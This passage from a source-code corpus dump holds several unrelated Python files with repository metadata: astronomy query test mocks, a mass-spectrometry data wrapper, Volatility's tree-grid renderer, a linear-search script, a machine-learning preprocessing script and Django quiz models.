t.add_column(m, name='Bmag')
t.add_column(e, name='e_Bmag')
q = {'II/336/apass9' : t }
return q
def mock_vizier_query_region_ps_r(*args, **kwargs):
t = mock_vizier_query_region()
m,e = create_table_cols()
qual = Column(np.array([52,52,52,3,52,3,52],dtype='uint8'))
t.add_column(m, name='rmag')
t.add_column(e, name='e_rmag')
t.add_column(m, name='imag')
t.add_column(e, name='e_imag')
t.add_column(qual, name='Qual')
q = {'II/349/ps1' : t }
return q
def mock_vizier_query_region_sdss_r(*args, **kwargs):
t = mock_vizier_query_region_sdss()
m,e = create_table_cols()
qual = Column(np.array([52,3,3,3,52,3,52],dtype='uint8'))
t.add_column(m, name='rmag')
t.add_column(e, name='e_rmag')
t.add_column(m, name='imag')
t.add_column(e, name='e_imag')
t.add_column(qual, name='Q')
q = {'V/147/sdss12' : t }
return q
def mock_vizier_apass_b(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_apass_b)
return mock
def mock_vizier_apass_v(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_apass_v)
return mock
def mock_vizier_ps_r(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_ps_r)
return mock
def mock_vizier_sdss_r(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_sdss_r)
return mock
| 33.438202 | 131 | 0.681452 |
76010a7006fa4f6c0a3e0ebc2e86288fb686be92 | 3,158 | py | Python | fisher_py/data/business/reaction.py | abdelq/fisher_py | befb98732ba7c4e57858d158c68cda09ed829d66 | [
"MIT"
] | 3 | 2021-11-03T20:55:45.000Z | 2022-02-01T10:11:47.000Z | fisher_py/data/business/reaction.py | abdelq/fisher_py | befb98732ba7c4e57858d158c68cda09ed829d66 | [
"MIT"
] | 2 | 2022-01-28T02:04:21.000Z | 2022-01-29T01:29:14.000Z | fisher_py/data/business/reaction.py | abdelq/fisher_py | befb98732ba7c4e57858d158c68cda09ed829d66 | [
"MIT"
] | 1 | 2022-01-26T23:30:37.000Z | 2022-01-26T23:30:37.000Z | from fisher_py.net_wrapping import NetWrapperBase
from fisher_py.data.filter_enums import ActivationType
class Reaction(NetWrapperBase):
"""
The Reaction interface. Defines a reaction for fragmenting an ion (an MS/MS stage).
"""
def __init__(self, reaction_net):
super().__init__()
self._wrapped_object = reaction_net
@property
def precursor_mass(self) -> float:
"""
Gets the precursor mass (mass acted on)
"""
return self._get_wrapped_object_().PrecursorMass
@property
def collision_energy(self) -> float:
"""
Gets the collision energy of this reaction
"""
return self._get_wrapped_object_().CollisionEnergy
@property
def isolation_width(self) -> float:
"""
Gets the isolation width of the precursor mass
"""
return self._get_wrapped_object_().IsolationWidth
@property
def precursor_range_is_valid(self) -> bool:
"""
Gets a value indicating whether precursor range is valid. If this is true, then
ThermoFisher.CommonCore.Data.Business.IReaction.PrecursorMass is still the center
of the range, but the values ThermoFisher.CommonCore.Data.Business.IReaction.FirstPrecursorMass
and ThermoFisher.CommonCore.Data.Business.IReaction.LastPrecursorMass define
the limits of the precursor mass range
"""
return self._get_wrapped_object_().PrecursorRangeIsValid
@property
def first_precursor_mass(self) -> float:
"""
Gets the start of the precursor mass range (only if ThermoFisher.CommonCore.Data.Business.IReaction.PrecursorRangeIsValid)
"""
return self._get_wrapped_object_().FirstPrecursorMass
@property
def last_precursor_mass(self) -> float:
"""
Gets the end of the precursor mass range (only if ThermoFisher.CommonCore.Data.Business.IReaction.PrecursorRangeIsValid)
"""
return self._get_wrapped_object_().LastPrecursorMass
@property
def collision_energy_valid(self) -> bool:
"""
Gets a value indicating whether collision energy is valid.
"""
return self._get_wrapped_object_().CollisionEnergyValid
@property
def activation_type(self) -> ActivationType:
"""
Gets the activation type.
"""
return ActivationType(self._get_wrapped_object_().ActivationType)
@property
def multiple_activation(self) -> bool:
"""
Gets a value indicating whether this is a multiple activation. In a table of
reactions, a multiple activation is a second, or further, activation (fragmentation
method) applied to the same precursor mass. Precursor mass values should be obtained
from the original activation, and may not be returned by subsequent multiple
activations.
"""
return self._get_wrapped_object_().MultipleActivation
@property
def isolation_width_offset(self) -> float:
"""
Gets the isolation width offset.
"""
return self._get_wrapped_object_().IsolationWidthOffset
| 34.326087 | 130 | 0.677961 |
94afc8ea17ee47132b10cb959a21c07a33b45acc | 16,518 | py | Python | volatility/framework/renderers/__init__.py | dl9rdz/volatility3 | 9d9cdfb7d43b98662089503fdb85f103d551b543 | [
"Linux-OpenIB"
] | null | null | null | volatility/framework/renderers/__init__.py | dl9rdz/volatility3 | 9d9cdfb7d43b98662089503fdb85f103d551b543 | [
"Linux-OpenIB"
] | null | null | null | volatility/framework/renderers/__init__.py | dl9rdz/volatility3 | 9d9cdfb7d43b98662089503fdb85f103d551b543 | [
"Linux-OpenIB"
] | null | null | null | # This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""Renderers.
Renderers display the unified output format in some manner (be it text
or file or graphical output
"""
import collections
import datetime
import logging
from typing import Any, Callable, Iterable, List, Optional, Tuple, TypeVar, Union
from volatility.framework import interfaces
from volatility.framework.interfaces import renderers
vollog = logging.getLogger(__name__)
class UnreadableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which are empty because the data cannot be
read."""
class UnparsableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which are empty because the data cannot be
interpreted correctly."""
class NotApplicableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which are empty because they don't make
sense for this node."""
class NotAvailableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which cannot be provided now (but might in
a future run)
This might occur when information packed with volatility (such as
symbol information) is not available, but a future version or a
different run may later have that information available (ie, it
could be applicable, but we can't get it and it's not because it's
unreadable or unparsable). Unreadable and Unparsable should be used
in preference, and only if neither fits should this be used.
"""
class TreeNode(interfaces.renderers.TreeNode):
"""Class representing a particular node in a tree grid."""
def __init__(self, path: str, treegrid: 'TreeGrid', parent: Optional['TreeNode'],
values: List[interfaces.renderers.BaseTypes]) -> None:
if not isinstance(treegrid, TreeGrid):
raise TypeError("Treegrid must be an instance of TreeGrid")
self._treegrid = treegrid
self._parent = parent
self._path = path
self._validate_values(values)
self._values = treegrid.RowStructure(*values) # type: ignore
def __repr__(self) -> str:
return "<TreeNode [{}] - {}>".format(self.path, self._values)
def __getitem__(self, item: Union[int, slice]) -> Any:
return self._treegrid.children(self).__getitem__(item)
def __len__(self) -> int:
return len(self._treegrid.children(self))
def _validate_values(self, values: List[interfaces.renderers.BaseTypes]) -> None:
"""A function for raising exceptions if a given set of values is
invalid according to the column properties."""
if not (isinstance(values, collections.Sequence) and len(values) == len(self._treegrid.columns)):
raise TypeError(
"Values must be a list of objects made up of simple types and number the same as the columns")
for index in range(len(self._treegrid.columns)):
column = self._treegrid.columns[index]
val = values[index]
if not isinstance(val, (column.type, interfaces.renderers.BaseAbsentValue)):
raise TypeError(
"Values item with index {} is the wrong type for column {} (got {} but expected {})".format(
index, column.name, type(val), column.type))
# TODO: Consider how to deal with timezone naive/aware datetimes (and alert plugin uses to be precise)
# if isinstance(val, datetime.datetime):
# tznaive = val.tzinfo is None or val.tzinfo.utcoffset(val) is None
@property
def values(self) -> Iterable[interfaces.renderers.BaseTypes]:
"""Returns the list of values from the particular node, based on column
index."""
return self._values
@property
def path(self) -> str:
"""Returns a path identifying string.
This should be seen as opaque by external classes, Parsing of
path locations based on this string are not guaranteed to remain
stable.
"""
return self._path
@property
def parent(self) -> Optional['TreeNode']:
"""Returns the parent node of this node or None."""
return self._parent
@property
def path_depth(self) -> int:
"""Return the path depth of the current node."""
return len(self.path.split(TreeGrid.path_sep))
def path_changed(self, path: str, added: bool = False) -> None:
"""Updates the path based on the addition or removal of a node higher
up in the tree.
This should only be called by the containing TreeGrid and
expects to only be called for affected nodes.
"""
components = self._path.split(TreeGrid.path_sep)
changed = path.split(TreeGrid.path_sep)
changed_index = len(changed) - 1
if int(components[changed_index]) >= int(changed[-1]):
components[changed_index] = str(int(components[changed_index]) + (1 if added else -1))
self._path = TreeGrid.path_sep.join(components)
class TreeGrid(interfaces.renderers.TreeGrid):
"""Class providing the interface for a TreeGrid (which contains TreeNodes)
The structure of a TreeGrid is designed to maintain the structure of the tree in a single object.
For this reason each TreeNode does not hold its children, they are managed by the top level object.
This leaves the Nodes as simple data carries and prevents them being used to manipulate the tree as a whole.
This is a data structure, and is not expected to be modified much once created.
Carrying the children under the parent makes recursion easier, but then every node is its own little tree
and must have all the supporting tree functions. It also allows for a node to be present in several different trees,
and to create cycles.
"""
path_sep = "|"
def __init__(self, columns: List[Tuple[str, interfaces.renderers.BaseTypes]],
generator: Optional[Iterable[Tuple[int, Tuple]]]) -> None:
"""Constructs a TreeGrid object using a specific set of columns.
The TreeGrid itself is a root element, that can have children but no values.
The TreeGrid does *not* contain any information about formatting,
these are up to the renderers and plugins.
Args:
columns: A list of column tuples made up of (name, type).
generator: An iterable containing row for a tree grid, each row contains a indent level followed by the values for each column in order.
"""
self._populated = False
self._row_count = 0
self._children = [] # type: List[TreeNode]
converted_columns = [] # type: List[interfaces.renderers.Column]
if len(columns) < 1:
raise ValueError("Columns must be a list containing at least one column")
for (name, column_type) in columns:
is_simple_type = issubclass(column_type, self.base_types)
if not is_simple_type:
raise TypeError("Column {}'s type is not a simple type: {}".format(name,
column_type.__class__.__name__))
converted_columns.append(interfaces.renderers.Column(name, column_type))
self.RowStructure = collections.namedtuple("RowStructure",
[self.sanitize_name(column.name) for column in converted_columns])
self._columns = converted_columns
if generator is None:
generator = []
generator = iter(generator)
self._generator = generator
@staticmethod
def sanitize_name(text: str) -> str:
output = ""
for letter in text.lower():
if letter != ' ':
output += (letter if letter in 'abcdefghiljklmnopqrstuvwxyz_0123456789' else '_')
return output
def populate(self,
function: interfaces.renderers.VisitorSignature = None,
initial_accumulator: Any = None,
fail_on_errors: bool = True) -> Optional[Exception]:
"""Populates the tree by consuming the TreeGrid's construction
generator Func is called on every node, so can be used to create output
on demand.
This is equivalent to a one-time visit.
Args:
function: The visitor to be called on each row of the treegrid
initial_accumulator: The initial value for an accumulator passed to the visitor to allow it to maintain state
fail_on_errors: A boolean defining whether exceptions should be caught or bubble up
"""
accumulator = initial_accumulator
if function is None:
def function(_x: interfaces.renderers.TreeNode, _y: Any) -> Any:
return None
if not self.populated:
try:
prev_nodes = [] # type: List[TreeNode]
for (level, item) in self._generator:
parent_index = min(len(prev_nodes), level)
parent = prev_nodes[parent_index - 1] if parent_index > 0 else None
treenode = self._append(parent, item)
prev_nodes = prev_nodes[0:parent_index] + [treenode]
if function is not None:
accumulator = function(treenode, accumulator)
self._row_count += 1
except Exception as excp:
if fail_on_errors:
raise
vollog.debug("Exception during population: {}".format(excp))
self._populated = True
return excp
self._populated = True
@property
def populated(self):
"""Indicates that population has completed and the tree may now be
manipulated separately."""
return self._populated
@property
def columns(self) -> List[interfaces.renderers.Column]:
"""Returns the available columns and their ordering and types."""
return self._columns
@property
def row_count(self) -> int:
"""Returns the number of rows populated."""
return self._row_count
def children(self, node) -> List[interfaces.renderers.TreeNode]:
"""Returns the subnodes of a particular node in order."""
return [node for node, _ in self._find_children(node)]
def _find_children(self, node):
"""Returns the children list associated with a particular node.
Returns None if the node does not exist
"""
children = self._children
try:
if node is not None:
for path_component in node.path.split(self.path_sep):
_, children = children[int(path_component)]
except IndexError:
return []
return children
def values(self, node):
"""Returns the values for a particular node.
The values returned are mutable,
"""
if node is None:
raise TypeError("Node must be a valid node within the TreeGrid")
return node.values
def _append(self, parent, values):
"""Adds a new node at the top level if parent is None, or under the
parent node otherwise, after all other children."""
children = self.children(parent)
return self._insert(parent, len(children), values)
def _insert(self, parent, position, values):
"""Inserts an element into the tree at a specific position."""
parent_path = ""
children = self._find_children(parent)
if parent is not None:
parent_path = parent.path + self.path_sep
newpath = parent_path + str(position)
tree_item = TreeNode(newpath, self, parent, values)
for node, _ in children[position:]:
self.visit(node, lambda child, _: child.path_changed(newpath, True), None)
children.insert(position, (tree_item, []))
return tree_item
def is_ancestor(self, node, descendant):
"""Returns true if descendent is a child, grandchild, etc of node."""
return descendant.path.startswith(node.path)
def max_depth(self):
"""Returns the maximum depth of the tree."""
return self.visit(None, lambda n, a: max(a, self.path_depth(n)), 0)
_T = TypeVar("_T")
def visit(self,
node: Optional[interfaces.renderers.TreeNode],
function: Callable[[interfaces.renderers.TreeNode, _T], _T],
initial_accumulator: _T,
sort_key: Optional[interfaces.renderers.ColumnSortKey] = None):
"""Visits all the nodes in a tree, calling function on each one.
function should have the signature function(node, accumulator) and return new_accumulator
If accumulators are not needed, the function must still accept a second parameter.
The order of that the nodes are visited is always depth first, however, the order children are traversed can
be set based on a sort_key function which should accept a node's values and return something that can be
sorted to receive the desired order (similar to the sort/sorted key).
We use the private _find_children function so that we don't have to re-traverse the tree
for every node we descend further down
"""
if not self.populated:
self.populate()
# Find_nodes is path dependent, whereas _visit is not
# So in case the function modifies the node's path, find the nodes first
children = self._find_children(node)
accumulator = initial_accumulator
# We split visit into two, so that we don't have to keep calling find_children to traverse the tree
if node is not None:
accumulator = function(node, initial_accumulator)
if children is not None:
if sort_key is not None:
sort_key_not_none = sort_key # Only necessary because of mypy
children = sorted(children, key = lambda x: sort_key_not_none(x[0].values))
if not sort_key.ascending:
children = reversed(children)
accumulator = self._visit(children, function, accumulator, sort_key)
return accumulator
def _visit(self,
           list_of_children: List['TreeNode'],
           function: Callable,
           accumulator: _T,
           sort_key: Optional[interfaces.renderers.ColumnSortKey] = None) -> _T:
    """Visits all the nodes in a tree, calling function on each one.

    Internal depth-first worker for :meth:`visit`: it receives the already
    pre-fetched ``(node, children)`` pairs so the tree is never re-searched.
    """
    if list_of_children is not None:
        for n, children in list_of_children:
            # Visit the node first (pre-order), then descend into its children.
            accumulator = function(n, accumulator)
            if sort_key is not None:
                sort_key_not_none = sort_key  # Only necessary because of mypy
                children = sorted(children, key = lambda x: sort_key_not_none(x[0].values))
                if not sort_key.ascending:
                    children = reversed(children)
            accumulator = self._visit(children, function, accumulator, sort_key)
    return accumulator
class ColumnSortKey(interfaces.renderers.ColumnSortKey):
    """Sort-key callable that orders TreeGrid rows by a named column,
    substituting type-appropriate minimum sentinels for absent values."""

    def __init__(self, treegrid: TreeGrid, column_name: str, ascending: bool = True) -> None:
        _index = None
        self._type = None
        self.ascending = ascending
        # Case-insensitive search for the column; note the loop does not
        # break, so with duplicate names the LAST match wins.
        for i in range(len(treegrid.columns)):
            column = treegrid.columns[i]
            if column.name.lower() == column_name.lower():
                _index = i
                self._type = column.type
        if _index is None:
            raise ValueError("Column not found in TreeGrid columns: {}".format(column_name))
        self._index = _index

    def __call__(self, values: List[Any]) -> Any:
        """The key function passed as the sort key."""
        value = values[self._index]
        # Absent values cannot be compared against real ones, so map them to
        # a minimum sentinel matching the column's declared type.
        if isinstance(value, interfaces.renderers.BaseAbsentValue):
            if self._type == datetime.datetime:
                value = datetime.datetime.min
            elif self._type in [int, float]:
                value = -1
            elif self._type == bool:
                value = False
            elif self._type in [str, renderers.Disassembly]:
                value = "-"
            elif self._type == bytes:
                value = b""
        return value
| 43.468421 | 148 | 0.637547 |
23d07d2cc80472aab4ffd32ec403e237bef306e5 | 434 | py | Python | linear_search.py | svikash/python-basic-program | e0542d98c2985c71cfbaaf3f09ccfdb747a9e2af | [
"MIT"
] | null | null | null | linear_search.py | svikash/python-basic-program | e0542d98c2985c71cfbaaf3f09ccfdb747a9e2af | [
"MIT"
] | null | null | null | linear_search.py | svikash/python-basic-program | e0542d98c2985c71cfbaaf3f09ccfdb747a9e2af | [
"MIT"
] | 1 | 2018-10-01T06:04:27.000Z | 2018-10-01T06:04:27.000Z | n=int(input("enter size of list"))
# Read the list elements from the user (`n` is read just above this block).
items = []
print("enter the elements of list")
for _ in range(0, n):
    items.append(int(input("")))
print("the list is ")
print(items)
search = int(input("enter the number you want to search in list"))
# Linear search: scan every element and report the first match.
# BUG FIX: the original printed "element not found" and stopped as soon as
# the FIRST element failed to match; the for/else form only reports a miss
# after the whole list has been scanned without a `break`.
for j in range(0, n):
    if items[j] == search:
        print("found at pos", j + 1)
        break
else:
    print("element not found")
| 22.842105 | 65 | 0.569124 |
76f45d488d272a010970d255a5281b72591cc5e2 | 7,045 | py | Python | ml-prediction/ml.py | XiyueWang/arvato_segement_prediction | 84a922b935d039efaf7c7006270eb6066c200f38 | [
"CNRI-Python"
] | null | null | null | ml-prediction/ml.py | XiyueWang/arvato_segement_prediction | 84a922b935d039efaf7c7006270eb6066c200f38 | [
"CNRI-Python"
] | null | null | null | ml-prediction/ml.py | XiyueWang/arvato_segement_prediction | 84a922b935d039efaf7c7006270eb6066c200f38 | [
"CNRI-Python"
] | null | null | null | import numpy as np
import pandas as pd
from sklearn.metrics import roc_auc_score, roc_curve, precision_recall_curve, auc
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import GridSearchCV
from imblearn.under_sampling import TomekLinks
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
def get_attribute(excel_filepath='DIAS Attributes - Values 2017'):
    '''Processes attribute description data.

    The spreadsheet lists one attribute name followed by several rows of its
    possible values; a non-empty ``Attribute`` cell marks the start of a block.

    Args:
        excel_filepath: path of the Excel file with attribute information
    Returns:
        dict: mapping of attribute name -> list of its values
    '''
    att_values = pd.read_excel(excel_filepath, header=1)
    att_values = att_values.fillna('')
    att_values.drop('Unnamed: 0', axis=1, inplace=True)
    # Row positions where a new attribute block starts.
    idx = [i for i in range(att_values.shape[0]) if len(att_values.Attribute[i]) > 0]
    attr_dict = {}
    for i in range(len(idx) - 1):
        key_name = att_values.Attribute[idx[i]]
        attr_dict[key_name] = att_values.Value[idx[i]:idx[i + 1]].tolist()
    # BUG FIX: the last attribute must take rows from its own start (idx[-1])
    # to the end of the sheet. The original sliced from the stale loop
    # variable `idx[i]:` — giving the last key the wrong values, and raising
    # NameError when the sheet contained only one attribute.
    last_key = att_values.Attribute[idx[-1]]
    attr_dict[last_key] = att_values.Value[idx[-1]:].tolist()
    return attr_dict
def check_value(x):
    """Normalize one raw cell value.

    Floats pass through untouched, the placeholder codes 'X'/'XX' become NaN,
    and anything else is parsed as a float.
    """
    if type(x) is float:
        return x
    if x == 'X' or x == 'XX':
        return np.nan
    return float(x)
def clean_data(df, attr_dict):
    '''Processes data
    - Converts missing values to np.nan using loaded features table
    - Drops unwanted columns and rows
    - Convert mixed datatype to float
    - Perfroms feature enginerring
    Args:
        df (pd.Dataframe): data to be cleaned
        attr_dict (dict): feature information
        NOTE(review): attr_dict is accepted but never used in this function.
    Returns:
        cleaned_df (pd.Dataframe): cleaned rows
    '''
    clean_df = df.copy()
    # Columns 18-19 hold mixed str/float codes where 'X'/'XX' mean missing.
    cols = clean_df.columns[18:20]
    for col in cols:
        clean_df[col] = clean_df[col].apply(lambda x: check_value(x))
    col_nulls = clean_df.isnull().sum()/clean_df.shape[0]
    # NOTE(review): row_nulls is computed but never used below.
    row_nulls = clean_df.isnull().sum(axis=1)/clean_df.shape[1]
    # keep columns with at most 22% nulls in the azdias dataframe
    cols = col_nulls[col_nulls<=0.22].index.tolist()
    clean_df = clean_df.loc[:, cols]
    # remove columns with kba
    kba_cols = clean_df.columns[clean_df.columns.str.startswith('KBA')]
    clean_df.drop(list(kba_cols), axis=1, inplace=True)
    # one-hot encode the east/west region flag
    dummy = pd.get_dummies(clean_df['OST_WEST_KZ'])
    clean_df.drop('OST_WEST_KZ', axis=1, inplace=True)
    clean_df = pd.concat([clean_df, dummy], axis=1)
    # re-engineer PRAEGENDE_JUGENDJAHRE: collapse the 15 youth-era codes into decades
    to_replace = {1:4, 2:4, 3:5, 4:5, 5:6, 6:6, 7:6, 8:7, 9:7, 10:8, 11:8, 12:8, 13:8, 14:9, 15:9}
    clean_df['decade'] = clean_df['PRAEGENDE_JUGENDJAHRE'].replace(to_replace)
    clean_df.drop(['CAMEO_DEU_2015', 'PRAEGENDE_JUGENDJAHRE', 'D19_LETZTER_KAUF_BRANCHE', 'EINGEFUEGT_AM'] , axis=1, inplace=True)
    return clean_df
def fill_null(clean_df):
    '''This function takes the cleaned df, fill numerical columns with mean, and
    categorical columns with median.
    Args: clean df
    Return: df without missing values

    NOTE(review): this function relies on a module-level global `attr_dict`
    (produced by get_attribute); calling it before that global exists raises
    NameError — confirm the intended call order.
    '''
    # select columns with numerical values (value list starts with the '…' marker)
    num_col = []
    for key, item in attr_dict.items():
        if item[0] == '…':
            num_col.append(key)
    # fill mean for numerical columns
    for col in num_col:
        try:
            az_mean = clean_df[col].mean()
            clean_df[col] = clean_df[col].fillna(az_mean)
        except KeyError:
            continue
    # fill remaining columns with the median
    # NOTE(review): despite the original "mode" comment, the code below fills
    # with the median for every remaining column.
    for col in clean_df.columns:
        try:
            az_median = clean_df[col].median()
            clean_df[col] = clean_df[col].fillna(az_median)
        except KeyError:
            continue
    return clean_df
def build_model(model):
    '''
    Creates a two-step pipeline (feature scaling followed by the classifier)
    and wraps it in a grid search over the classifier's hyper-parameters.

    Input:
        model: object type that implements the "fit" and "predict" methods
    Output:
        cv: GridSearchCV object exposing "fit" and "predict"
    '''
    steps = [
        ('scaler', StandardScaler()),
        ('clf', model),
    ]
    # NOTE: boosting_type / num_leaves are LightGBM-style parameter names —
    # the supplied `model` must accept them.
    search_space = {
        'clf__n_estimators': [50, 100, 200],
        'clf__learning_rate': [0.001, 0.01, 0.1],
        'clf__boosting_type': ['gbdt', 'dart'],
        'clf__num_leaves': [31, 62],
    }
    return GridSearchCV(Pipeline(steps), param_grid=search_space)
def clean_test(df_cus):
    '''Processes test/customer data (mutates and returns df_cus):
    - Converts 'X'/'XX' placeholders in the two mixed-type columns to np.nan
    - One-hot encodes the OST_WEST_KZ region flag
    - Maps PRAEGENDE_JUGENDJAHRE codes onto a `decade` feature
    - Drops columns not used downstream

    Args:
        df_cus (pd.DataFrame): data to be cleaned
    Returns:
        pd.DataFrame: cleaned data
    '''
    # Columns 18-19 hold mixed str/float codes ('X'/'XX' mean missing).
    cols = df_cus.columns[18:20]
    for col in cols:
        # BUG FIX: the original called ml.check_value, but no `ml` module is
        # imported here (this file IS ml.py) -> NameError at runtime; call
        # the sibling helper directly.
        df_cus[col] = df_cus[col].apply(lambda x: check_value(x))
    # one-hot encode the east/west region flag
    dummy = pd.get_dummies(df_cus['OST_WEST_KZ'])
    df_cus.drop('OST_WEST_KZ', axis=1, inplace=True)
    df_cus = pd.concat([df_cus, dummy], axis=1)
    # collapse the 15 youth-era codes into decades
    to_replace = {1: 4, 2: 4, 3: 5, 4: 5, 5: 6, 6: 6, 7: 6, 8: 7, 9: 7,
                  10: 8, 11: 8, 12: 8, 13: 8, 14: 9, 15: 9}
    df_cus['decade'] = df_cus['PRAEGENDE_JUGENDJAHRE'].replace(to_replace)
    # drop columns that are no longer needed
    df_cus.drop(['CAMEO_DEU_2015', 'PRAEGENDE_JUGENDJAHRE'], axis=1, inplace=True)
    return df_cus
def evaluate_model(cv, X_test, y_test):
    """Draw the ROC curve (with a secondary threshold axis) for a fitted
    search object and persist its best hyper-parameters to disk.

    Args:
        cv: fitted GridSearchCV (anything with predict_proba / best_params_)
        X_test, y_test: array-like evaluation data
    Returns:
        None; renders a matplotlib figure and writes ``parameters.pkl``.

    NOTE(review): relies on a module-level ``plt`` (matplotlib.pyplot) that is
    not imported in this module's visible header — confirm it is imported.
    """
    y_pred = cv.predict_proba(X_test)[:, 1]
    print('\nBest Parameters:', cv.best_params_)
    fpr, tpr, thresholds = roc_curve(y_test, y_pred)
    roc_auc = auc(fpr, tpr)  # compute area under the curve
    plt.figure()
    plt.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % (roc_auc))
    plt.plot([0, 1], [0, 1], 'k--')  # chance diagonal
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel('False Positive Rate')
    plt.ylabel('True Positive Rate')
    plt.title('Receiver operating characteristic')
    plt.legend(loc="lower right")
    # create the axis of thresholds (scores)
    ax2 = plt.gca().twinx()
    ax2.plot(fpr, thresholds, markeredgecolor='r', linestyle='dashed', color='r')
    ax2.set_ylabel('Threshold', color='r')
    ax2.set_ylim([thresholds[-1], thresholds[0]])
    ax2.set_xlim([fpr[0], fpr[-1]])
    print('Saving model...')
    import pickle  # local import: pickle is not imported at module level
    # BUG FIX: the original opened the file without ever closing it; the
    # context manager guarantees the handle is released even on error.
    with open('parameters.pkl', 'wb') as f:
        pickle.dump(cv.best_params_, f)
3e6044ec5e462f98f0bc3ac520e1b03382de7212 | 3,898 | py | Python | quiz/models/quiz.py | manikagarg/iQuiz | 99b2550eeedb92134a631d71fdb017844f81ef78 | [
"MIT"
] | null | null | null | quiz/models/quiz.py | manikagarg/iQuiz | 99b2550eeedb92134a631d71fdb017844f81ef78 | [
"MIT"
] | null | null | null | quiz/models/quiz.py | manikagarg/iQuiz | 99b2550eeedb92134a631d71fdb017844f81ef78 | [
"MIT"
] | 1 | 2021-09-26T14:10:28.000Z | 2021-09-26T14:10:28.000Z | from django.db import models
from django.utils import timezone
import datetime
#from django.core.validators import MinValueValidator, MaxValueValidator
from .lti_user import *
from . import custom_fields as custom_fields
class Quiz(models.Model):
    """
    The Quiz Model is used to store the basic information about the quiz.
    The Primary Key (auto generated) will be used as Quiz Id.
    """
    # LTI consumer key of the tool consumer that launched this quiz.
    consumer_key = models.CharField(max_length=100, help_text='Used to store LTI consumer key')
    resourceLinkId = models.CharField(max_length=100, help_text = "Resource_link_id")
    contextId = models.CharField(
        max_length=200,
        help_text="Context Id: Unique for each term (run) of the course"
    )
    # NOTE(review): datetime.datetime.utcnow yields a NAIVE datetime; with
    # Django's USE_TZ enabled an aware default is expected — confirm settings.
    createdOn = models.DateTimeField(default=datetime.datetime.utcnow)
    # auto_now=True already refreshes this field on every save(); the manual
    # assignment in save() below is redundant but harmless.
    updatedOn = models.DateTimeField(auto_now=True)
    quizName = models.CharField(max_length=100, blank=True)
    published = models.BooleanField(default=False)
    isEverAttempted = models.BooleanField(
        default=False,
        help_text="Set to True if the Quiz has been attempted by at least one student"
    )

    def save(self, *args, **kwargs):
        # Stamp the modification time explicitly before delegating to Django.
        self.updatedOn = datetime.datetime.utcnow()
        super().save(*args, **kwargs)

    def __str__(self):
        # Prefer the human-readable name; fall back to "<context> : <created>".
        if (self.quizName != ''):
            return self.quizName
        return str(self.contextId) + " : " + str(self.createdOn)

    class Meta:
        get_latest_by = "createdOn"
class QuizSettings(models.Model):
    """
    The class to store the Settings of a Quiz.
    One settings row exists per quiz (shares the quiz's primary key).
    """
    quiz = models.OneToOneField(Quiz, on_delete = models.CASCADE, primary_key=True)
    deadline = models.DateTimeField(
        blank=True,
        null=True,
        verbose_name="Deadline",
        help_text="Set the deadline for the Quiz. Leave blank if not required"
    )
    # NULL value of duration means unlimited time
    duration = custom_fields.IntegerRangeField(
        default=30,
        null=True,
        verbose_name="Duration",
        min_value=1,
        blank=True,
        help_text="Set the duration of quiz in minutes. Leave blank if timer is not required")
    timeBetweenAttempt = custom_fields.IntegerRangeField(
        default=0, null=True,
        verbose_name="Time Between Attempts",
        min_value=0,
        help_text="Set the time between the two consecutive attempts."
    )
    # NULL means unlimited attempts.
    maxAttempts = custom_fields.IntegerRangeField(
        blank=True,
        null=True,
        verbose_name="Maximum Attempts",
        help_text="Set the maximum number of allowed attempts. Leave blank for unlimited attempts."
    )
    graded = models.BooleanField(
        default = True,
        verbose_name="Graded",
        help_text="Set whether the quiz is graded"
    )
    information = models.TextField(
        default='',
        verbose_name="Information",
        help_text="Set the information that will be shown to the student on the quiz page.\
        This will be shown in a html modal on clicking the button 'Information'. Leave blank to hide the button."
    )
    # TODO: showAnswers = models.ChoiceField() ##To be implemented

    def __str__(self):
        if self.quiz.quizName != '':
            return self.quiz.quizName
        return str(self.quiz.contextId) + " : " + str(self.quiz.createdOn)

    def save(self, *args, **kwargs):
        # Normalize empty-string form values to NULL before saving.
        if self.deadline =='':
            self.deadline = None
        if self.duration == '':
            self.duration = None
        if self.maxAttempts == '':
            self.maxAttempts = None
        super().save(*args, **kwargs)
class QuizManager(models.Model):
    """
    The QuizManager model is used to store the details of the manager of the quiz.
    Link table: which LTI user manages which quiz.
    """
    quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
    manager = models.ForeignKey(LTIUser, on_delete=models.CASCADE)

    def __str__(self):
        return self.manager.name
a351a9854dcdf37c8857cd14380c11509f1d039c | 243 | py | Python | tests/utils/test_cbook.py | fossabot/jcvi | 86948affd63e94c8327cf117c47d36940b508b68 | [
"BSD-2-Clause"
] | 1 | 2020-10-04T13:21:24.000Z | 2020-10-04T13:21:24.000Z | tests/utils/test_cbook.py | Wangjien/jcvi | 6732285f62dcbd7f3878e5017c3350124530c796 | [
"BSD-2-Clause"
] | null | null | null | tests/utils/test_cbook.py | Wangjien/jcvi | 6732285f62dcbd7f3878e5017c3350124530c796 | [
"BSD-2-Clause"
] | null | null | null | import pytest
@pytest.mark.parametrize(
    "input,output", [("AT5G54690.2", "AT5G54690"), ("evm.test.1", "evm.test.1")],
)
def test_gene_name(input, output):
    """gene_name() strips the isoform suffix from AGI-style IDs but leaves EVM IDs intact."""
    # Imported lazily so test collection does not require jcvi at import time.
    from jcvi.utils.cbook import gene_name

    assert gene_name(input) == output
| 22.090909 | 81 | 0.683128 |
4cd6d530b4db1b2e9a037897cf2cdeb7fa06c57a | 1,199 | py | Python | profile/forms.py | ChristopherOloo/KilimoQAPortal | c905a42282bbce70b5477862185ad332185307ce | [
"MIT"
